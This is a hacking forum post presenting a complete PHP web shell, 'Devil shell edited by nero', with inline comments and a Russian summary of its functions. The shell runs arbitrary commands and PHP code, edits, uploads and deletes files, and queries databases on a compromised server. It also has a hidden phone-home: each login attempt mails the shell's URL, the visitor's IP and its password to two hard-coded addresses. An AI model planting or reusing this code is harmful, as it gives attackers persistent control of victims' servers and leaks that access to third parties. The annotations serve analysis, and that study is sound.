
Devil shell edited by nero

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем SiNTaKsIs, 13 июл 2014.

    Код:
    <?php
    // NOTE(review): this listing is a PHP web shell ("Devil shell"). It is annotated here
    // for defensive analysis; the comments describe what the code does, not what it should do.
    error_reporting(0); // Suppresses ALL errors and notices (the original comment said the opposite).
                        // This also hides the undefined-variable notices the login block below
                        // would otherwise emit ($cuser, $user, $puser, $pass, $headers, $self).
     
    $password = "12345"; // Plaintext, or a 32-char md5 hex digest (see the strlen()==32 check below).
                         // Plaintext passwords are capped at 31 chars so they are never mistaken for a digest.
     
    $me = basename(__FILE__);      // The script's own filename; used for every self-referencing link/form.
    $cookiename = "wieeeee";       // Auth cookie name. Its VALUE is the password (or its md5) in clear.
     
     
    // Login handler. Runs on every POST that carries "pass", whether or not the password is
    // right. Besides setting the auth cookie it also phones home (see the mail() call below).
    if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
    {
     
        if(strlen($password) == 32) //If the configured password is 32 chars, treat it as an md5 digest and hash the submitted value.
        {
            $_POST['pass'] = md5($_POST['pass']);
        }
     
        // Loose (==) comparison. If $password is an md5 digest of the "0e<digits>" form, any
        // submitted value whose md5 is also "0e<digits>" compares equal (numeric-string
        // juggling), so an unrelated plaintext logs in.
        if($_POST['pass'] == $password)
        {
                // The cookie value IS the credential (password or its md5), with no path/secure/httponly flags.
                setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
        }
            // BACKDOOR: $cuser, $user, $puser and $pass are never assigned anywhere in this file,
            // so with error_reporting(0) this is null==null && null==null -> always true. The block
            // therefore runs on EVERY login attempt, correct password or not.
            if($cuser==$user && $puser==$pass)
        {$_SESSION['a']=$_POST['uname']; // No session_start() in this file and the login form has no "uname" field: effectively a no-op.
        // Helper declared conditionally (it only exists once this branch has executed):
        // rebuilds the absolute URL of the current request from $_SERVER.
        function cuurPageURL() {
    $pagesURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {$pagesURL .= "s";}
    $pagesURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") { // any non-80 port is spelled out, including 443 over HTTPS
      $pagesURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    } else {
      $pagesURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pagesURL;
    }
    $ip = $_SERVER['REMOTE_ADDR'];
    $pagina = cuurPageURL();
    $datum = date("m-d-y / H:i:s");
    // Report body: timestamp, visitor IP, full shell URL and the CONFIGURED $password
    // (not the submitted one) -- i.e. the real credential, even on a failed attempt.
    $invoegen = $datum . " - " . $ip . " - " . $pagina . " - " . $password . "" ;
    // Hard-coded recipients: whoever deploys this shell hands its location and password to these two mailboxes.
    $to= "falloutxzero@gmail.com , xnerotfs@yahoo.com";
    $subject = "Shell Location";
    $message = $invoegen;
    mail($to,$subject,$message,$headers); // $headers is undefined (null); the notice is suppressed.
    // $self is undefined, so this emits a bare "location:" header. reload() below sends its own
    // Location header, which replaces this one (header() replaces same-named headers by default),
    // so the net effect is a redirect back to the script. Neither call exits; execution continues.
    header('location:'.$self);}
        reload();
     
    }
     
    // Auth gate. "&&" binds tighter than "or", so this reads
    //   (!empty($password) && !isset($_COOKIE[$cookiename])) or ($_COOKIE[$cookiename] != $password)
    // With a non-empty $password: no cookie -> login form; cookie present -> it must loosely (!=)
    // equal the password (or its md5). The cookie is the credential itself, sent in clear on every
    // request, so anyone who can read it (proxy logs, shared browser) holds the shell password.
    // With an empty $password and no cookie, the left side is false and null != "" is false:
    // the shell is then open to everyone, despite the "do not cross this line" comment below.
    if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
    {
        login(); // prints the password form (declared further down; top-level functions are hoisted)
        die();
    }
    //
    //Do not cross this line! All code placed after this block can't be executed without being logged in!
    //(Caveat: with an empty $password the gate above lets everyone through.)
    //
     
    // ?p=logout: expire the auth cookie and redirect to the script. Nothing has been printed
    // yet at this point (the HTML header is printed later), so the Location header still works.
    // reload() does not exit, so the rest of the page is still rendered for this request.
    if(isset($_GET['p']) && $_GET['p'] == "logout")
    {
    setcookie ($cookiename, "", time() - 3600);
    reload();
    }
    // ?dir=: change the process working directory to any caller-supplied path, unvalidated.
    // Every realpath('.') / opendir('.') / relative-path operation below is relative to it.
    if(isset($_GET['dir']))
    {
        chdir($_GET['dir']);
    }
     
     
    // Menu entries (key -> label) rendered in the page header as ?p=<key> links. The
    // dispatcher below also handles edit, delete, rename and createdir, which are reached
    // from the file listing / default page rather than from this menu.
    $pages = array(
        'cmd' => 'Execute Command',
        'eval' => 'Evaluate PHP',
        'mysql' => 'MySQL Query',
        'chmod' => 'Chmod File',
        'phpinfo' => 'PHPinfo',
        'md5' => 'md5 cracker',
        'headers' => 'Show headers',
        'logout' => 'Log out'
    );
     
    // Page header: <title>, inline CSS and a menu built from $pages. Every value spliced into
    // this HTML (getenv("HTTP_HOST"), $me, realpath('.')) is inserted unescaped; realpath('.')
    // reflects whatever directory the ?dir= parameter chdir()'d into above.
    $header = '<html>
    <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
    <head>
    <style>
    td {
        font-size: 12px;
        font-family: verdana;
        color: #33FF00;
        background: #000000;
    }
     
    #d {
        background: #003000;
    }
    #f {
        background: #003300;
    }
    #s {
        background: #006300;
    }
    #d:hover
    {
        background: #003300;
    }
    #f:hover
    {
        background: #003000;
    }
    pre {
        font-size: 10px;
        font-family: verdana;
        color: #33FF00;
    }
    a:hover {
    text-decoration: none;
    }
     
     
    input,textarea,select {
        border-top-width: 1px;
        font-weight: bold;
        border-left-width: 1px;
        font-size: 10px;
        border-left-color: #33FF00;
        background: #000000;
        border-bottom-width: 1px;
        border-bottom-color: #33FF00;
        color: #33FF00;
        border-top-color: #33FF00;
        font-family: verdana;
        border-right-width: 1px;
        border-right-color: #33FF00;
    }
     
    hr {
    color: #33FF00;
    background-color: #33FF00;
    height: 5px;
    }
     
    </style>
     
    </head>
    <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
    <table width=100%><td id="header" width=100%>
    <p align=right><b>[<a href="http://www.thefinalstring.com">TheFinalString</a>]  [<a href="'.$me.'">Home</a>] ';
     
    // One menu link per $pages entry; each carries the current directory so the target page
    // keeps operating in it.
    foreach($pages as $page => $page_name)
    {
        $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
     
    }
    // show_dirs() is declared near the end of the file; unconditional top-level function
    // declarations are hoisted, so the call resolves. (It uses ereg(), which is gone in PHP 7+.)
    $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
    // First byte of output: no header()/setcookie() call can succeed after this line.
    print $header;
     
     
     
    // Page footer (printed at the very end of the file). The <img> pulls a logo from
    // thefinalstring.com on every page view, so that host learns the viewing browser's IP and,
    // subject to the browser's referrer policy, the URL of this shell. The markup is also
    // malformed (stray "</head>" before "</html>") and the link host has a ".come" typo.
    $footer = '<tr><td><hr><center>&copy; <a href="http://www.TheFinalString.come">TheFinalString</a> - <a href="">Dante & Nero</a></center></td></table></body>
    <br>
     
    <br><Br><Br><center>
    <img src="http://thefinalstring.com/forums/digitalvb/vbfour/misc/vbulletin4_logo.png"><br><br><Br>
    <TT><span style="color: #00FF00; text-shadow: #006633 1px 1px 10px;"><b>CREATED BY DANTE</b></span></TT>
    </head></html>';
     
     
     
     
    //
    //Page handling
    //
    // Page dispatcher. $_REQUEST merges GET, POST and COOKIE, so "p" (and "command" below) can
    // arrive through any of them. Every case operates on caller-supplied paths and content with
    // no validation or escaping -- that is the shell's payload, not an oversight.
    if(isset($_REQUEST['p']))
    {
            switch ($_REQUEST['p']) {
               
                case 'cmd': //Run command
                    // Executes $_REQUEST['command'] verbatim through whichever exec-family
                    // function get_execution_method() selected; output lands inside <pre>, unescaped.
                    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
                        if(isset($_REQUEST['command']))
                        {
                            print "<pre>";
                            execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
                        }
                break;
               
               
                case 'edit': //Edit (or create) a file: arbitrary write of $_POST['editform'] to the path in $_GET['file'].
                    if(isset($_POST['editform']))
                    {
                        $f = $_GET['file'];
                        // "or print" only reports; on failure $fh is false and fwrite/fclose still run
                        // (warnings on PHP 5, which this shell targets; a TypeError on PHP 8).
                        $fh = fopen($f, 'w') or print "Error while opening file!";
                        fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
                        fclose($fh);
                    }
                    // $_GET['file'] is echoed raw into the page and into the form action.
                    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
                   
                    // Prefill the textarea with the current contents (escaped, so it round-trips).
                    if(file_exists($_GET['file']))
                    {
                        $rd = file($_GET['file']);
                        foreach($rd as $l)
                        {
                            print htmlspecialchars($l);
                        }
                    }
                   
                    print "</textarea><input type=submit value=\"Save\"></form>";
                   
                break;
               
                case 'delete': //Delete a file: unlink($_GET['file']) once the confirmation form (POST yes=yes) comes back.
               
                    if(isset($_POST['yes']))
                    {
                        if(unlink($_GET['file']))
                        {
                            print "File deleted successfully.";
                        }
                        else
                        {
                            print "Couldn't delete file.";
                        }
                    }
                   
                   
                    // First visit: show the confirmation prompt (path echoed raw).
                    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
                    {
                        print "Are you sure you want to delete ".$_GET['file']."?<br>
                        <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
                        <input type=hidden name=yes value=yes>
                        <input type=submit value=\"Delete\">
                        ";
                    }
               
               
                break;
               
               
                case 'eval': //Evaluate PHP code: eval() of $_POST['eval'] in this script's scope.
               
                    print "<form action=\"".$me."?p=eval\" method=POST>
                    <textarea cols=60 rows=10 name=\"eval\">";
                    if(isset($_POST['eval']))
                    {
                        print htmlspecialchars($_POST['eval']);
                    }
                    else
                    {
                        print "print \"Yo Momma\";";
                    }
                    print "</textarea><br>
                    <input type=submit value=\"Eval\">
                    </form>";
                   
                    if(isset($_POST['eval']))
                    {
                        print "<h1>Output:</h1>";
                        print "<br>";
                        // Parse/runtime errors in the submitted code are hidden by error_reporting(0).
                        eval($_POST['eval']);
                    }
               
                break;
               
                case 'chmod': //Chmod file
                   
                   
                    print "<h1>Under construction!</h1>"; // printed unconditionally
                    if(isset($_POST['chmod']))
                    {
                    // switch compares loosely, so the posted string "777" matches the integer label 777.
                    // Only these three modes are applied; any other value falls through untouched ...
                    switch ($_POST['chvalue']){
                        case 777:
                        chmod($_POST['chmod'],0777);
                        break;
                        case 644:
                        chmod($_POST['chmod'],0644);
                        break;
                        case 755:
                        chmod($_POST['chmod'],0755);
                        break;
                    }
                    // ... yet success is reported regardless of whether chmod() ran or succeeded.
                    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
                    }
                    if(isset($_GET['file']))
                    {
                        $content = urldecode($_GET['file']); // $_GET is already decoded; this is a second decode
                    }
                    else
                    {
                        $content = "file/path/please";
                    }
                   
                    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
                    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
                    <select name=\"chvalue\">
    <option value=\"777\">777</option>
    <option value=\"644\">644</option>
    <option value=\"755\">755</option>
    </select><input type=submit value=\"Change\">";
                   
                break;
               
                case 'mysql': //MySQL Query
               
                if(isset($_POST['host']))
                {
                    // Legacy mysql_* extension (removed in PHP 7.0): host, user and password come
                    // straight from the form. The query result is discarded ($result unused), so
                    // this page can only be used for side effects (INSERT/UPDATE/DDL), as the form text says.
                    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
                    mysql_select_db($_POST['dbase']);
                    $sql = $_POST['query'];
                   
                   
                    $result = mysql_query($sql);
                   
                }
                else
                {
                    print "
                    This only queries the database, doesn't return data!<br>
                    <form action=\"".$me."?p=mysql\" method=POST>
                    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
                    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
                    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
                    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
                   
                    <b>Query:<br></b<textarea name=query></textarea>
                    <input type=submit value=\"Query database\">
                    </form>
                    ";
                   
                }
               
                break;
               
                case 'createdir': // mkdir() of the raw ?crdir= value (default mode 0777, subject to umask).
                if(mkdir($_GET['crdir']))
                {
                print 'Directory created successfully.';
                }
                else
                {
                print 'Couldn\'t create directory';
                }
                break;
               
               
                case 'phpinfo': //PHP Info
                    phpinfo();
                break;
               
               
                case 'rename': // rename($_POST['fileold'], $_POST['filenew']) -- both raw; only the prefilled form value is escaped.
               
                    if(isset($_POST['fileold']))
                    {
                        if(rename($_POST['fileold'],$_POST['filenew']))
                        {
                            print "File renamed.";
                        }
                        else
                        {
                            print "Couldn't rename file.";
                        }
                       
                    }
                    if(isset($_GET['file']))
                    {
                        // Listing links pass an absolute path; basename() reduces it to a name relative to the cwd.
                        $file = basename(htmlspecialchars($_GET['file']));
                    }
                    else
                    {
                        $file = "";
                    }
                   
                    print "Renaming ".$file." in folder ".realpath('.').".<br>
                                    <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
                        <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
                        <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
                        <input type=submit value=\"Rename file\">
                        </form>";
                break;
               
                case 'md5': // Brute-force a 32-char md5 digest on the server's CPU.
                if(isset($_POST['md5']))
                {
                if(!is_numeric($_POST['timelimit']))
                {
                $_POST['timelimit'] = 30;
                }
                set_time_limit($_POST['timelimit']); // caller-chosen; ignored if the ini disallows it
                    if(strlen($_POST['md5']) == 32)
                    {
                       
                            // Numeric mode: tries 0..99999 only (the form advertises 1 - 9999999).
                            if($_POST['chars'] == "9999")
                            {
                            $i = 0;
                            while($_POST['md5'] != md5($i) && $i != 100000)
                                {
                                    $i++;
                                }
                            }
                            else
                            {
                                // Alphabetic mode ("a".."zzzzz" via string increment).
                                // BUG: the parentheses are misplaced -- md5($i == ...) hashes the boolean
                                // result of the comparison, and md5(false) == md5("") is a non-empty string,
                                // i.e. truthy, so the loop breaks on its first iteration with $i == "a".
                                // This mode can therefore only ever "crack" md5("a").
                                for($i = "a"; $i != "zzzzz"; $i++)
                                {
                                    if(md5($i == $_POST['md5']))
                                    {
                                        break;
                                    }
                                }
                            }
     
                       
                        // Final check is correct, so a miss simply prints nothing.
                        if(md5($i) == $_POST['md5'])
                        {
                                print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
                        }
                       
                    }
                   
                }
               
                print "Will bruteforce the md5
                    <form action=\"".$me."?p=md5\" method=POST>
                    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
                    <b>Characters:</b><br><select name=\"chars\">
                    <option value=\"az\">a - zzzzz</option>
                    <option value=\"9999\">1 - 9999999</option>
                    </select>
                    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
                    <input type=submit value=\"Bruteforce md5\">
                    </form><br>*: if set_time_limit is allowed by php.ini";
                break;
               
                case 'headers': // Dump the request headers (escaped). getallheaders() is not available on every SAPI.
                foreach(getallheaders() as $header => $value)
                {
                print htmlspecialchars($header . ":" . $value)."<br>";
               
                }
                break;
            }
     
    }
    else //Default page: file upload handler plus a listing of the current working directory.
    {
       
        $files = array();
        $directories = array();
       
        // Upload: the file is dropped into the cwd under its client-supplied basename, any type, no checks.
        if(isset($_FILES['uploadedfile']['name']))
    {
        $target_path = realpath('.').'/';
        $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
     
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            print "File:".  basename( $_FILES['uploadedfile']['name']).
            " has been uploaded";
        } else{
            echo "File upload failed!";
        }
    }
     
     
       
       
       
        print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
        // Listing of the cwd (as set by ?dir=). The handle is never closedir()'d.
        if ($handle = opendir('.'))
        {
            while (false !== ($file = readdir($handle)))
            {
                  if(is_dir($file))
                  {
                    $directories[] = $file;
                  }
                  else
                  {
                    $files[] = $file;
                  }
            }
        asort($directories);
        asort($files);
            // Directories: [R]ename / [D]elete links, name links to ?dir=<abs path>, mode links to chmod.
            foreach($directories as $file)
            {
                print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
            }
           
            // Files: same, but the name links to the editor and the size column is filled in.
            foreach($files as $file)
            {
                print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
            }
        }
        else
        {
            print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
        }
       
        // Upload / change-directory / create-file (routes to ?p=edit) / create-directory forms.
        print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
    <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
    <input type=\"submit\" value=\"Upload File\" />
    </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
    <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
    </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
    </table>";
     
     
    }
     
     
    // Prints the password prompt: a POST form back to this script with a single "pass" field
    // (maxlength 32, matching the md5-digest convention). The <table>/<td> it opens are never
    // closed; the caller die()s immediately afterwards.
    function login()
    {
        print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
        <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
        <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
        </form>";
    }
    // Redirects to this script's own filename via a Location header. Only effective before any
    // output (both callers run before the HTML header is printed). Does not exit.
    function reload()
    {
        header("Location: ".basename(__FILE__));
    }
     
    // Picks which exec-family function execute_command() should use. Later checks overwrite
    // earlier ones, so the effective preference is system > shell_exec > exec > passthru.
    // BUG: the shell_exec branch stores "shell_ exec" (with a space), which execute_command()
    // never matches -- if shell_exec is the only one available, commands silently do nothing.
    // Returns "Disabled" when none of the four exists.
    function get_execution_method()
    {
        if(function_exists('passthru')){ $m = "passthru"; }
        if(function_exists('exec')){ $m = "exec"; }
        if(function_exists('shell_exec')){ $m = "shell_ exec"; }
        if(function_exists('system')){ $m = "system"; }
        if(!isset($m)) //No method found :-|
        {
            $m = "Disabled";
        }
        return($m);
    }
     
    // Runs $command, unescaped, through the function named by $method (the "cmd" page).
    // passthru/system stream output straight to the response; exec collects lines and prints
    // them separated by <br>; shell_exec prints the captured output. Any other $method
    // ("Disabled", or the mistyped "shell_ exec" from get_execution_method()) matches no branch
    // and prints nothing.
    function execute_command($method,$command)
    {
        if($method == "passthru")
        {
            passthru($command);
        }
       
        elseif($method == "exec")
        {
            exec($command,$result);
            foreach($result as $output)
            {
                print $output."<br>";
            }
        }
       
        elseif($method == "shell_exec")
        {
            print shell_exec($command);
        }
       
        elseif($method == "system")
        {
            system($command);
        }
     
    }
     
    // Last four octal digits of the file's mode bits (e.g. "0644" or "0755"), or "????" when
    // the path does not exist.
    function perm($file)
    {
        if(file_exists($file))
        {
            return substr(sprintf('%o', fileperms($file)), -4);
        }
        else
        {
            return "????";
        }
    }
     
    // Colour for the listing's permission column, evaluated for the web server's own user:
    // green = writable, white = readable but not writable, red = neither (also the result for
    // a path that does not exist).
    function get_color($file)
    {
    if(is_writable($file)) { return "green";}
    if(!is_writable($file) && is_readable($file)) { return "white";}
    if(!is_writable($file) && !is_readable($file)) { return "red";}
     
     
     
    }
     
    // Breadcrumb for the absolute path of $where: each component becomes a ?dir=<prefix> link.
    // Uses ereg() (removed in PHP 7.0) and is called unconditionally while building the page
    // header, so the whole shell fatals on PHP 7+; it is a PHP 5 era tool. The drive-letter
    // test is case-sensitive ("c:" only); on a match the path is split on "\", otherwise on "/".
    function show_dirs($where)
    {
        if(ereg("^c:",realpath($where)))
        {
        $dirparts = explode('\\',realpath($where));
        }
        else
        {
        $dirparts = explode('/',realpath($where));
        }
       
       
       
        $i = 0;
        $total = "";
       
        foreach($dirparts as $part)
        {
            $p = 0;
            $pre = "";
            // $pre = every component before this one, joined with "/" (also on the Windows branch).
            while($p != $i)
            {
                $pre .= $dirparts[$p]."/";
                $p++;
               
            }
            // Link target and label are inserted unescaped.
            $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
            $i++;
        }
       
        return "<h2>".$total."</h2><br>";
     
    }
    // Footer goes out after the function declarations above (they are hoisted, so their
    // position has no effect on the earlier calls).
    print $footer;
     
    // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
    exit();
    ?>
    Shell в чёрно-зелёном стиле. Внимание: при каждой отправке формы входа (POST pass), независимо от правильности пароля, скрипт через mail() отправляет дату, IP, URL страницы и значение $password на falloutxzero@gmail.com и xnerotfs@yahoo.com (см. $to и mail()), а в футере подгружается картинка с thefinalstring.com — то есть авторы правки узнают адрес и пароль от залитого шелла. Кроме того, код использует ereg() и mysql_connect(), удалённые в PHP 7, поэтому работает только на PHP 5.
    Функции:
    Execute Command
    Evaluate PHP
    MySQL Query
    Chmod File
    PHPinfo
    md5 cracker
    Show headers
    Кроме того, из листинга файлов доступны редактирование, удаление, переименование и загрузка файлов, смена каталога и создание каталогов.
     
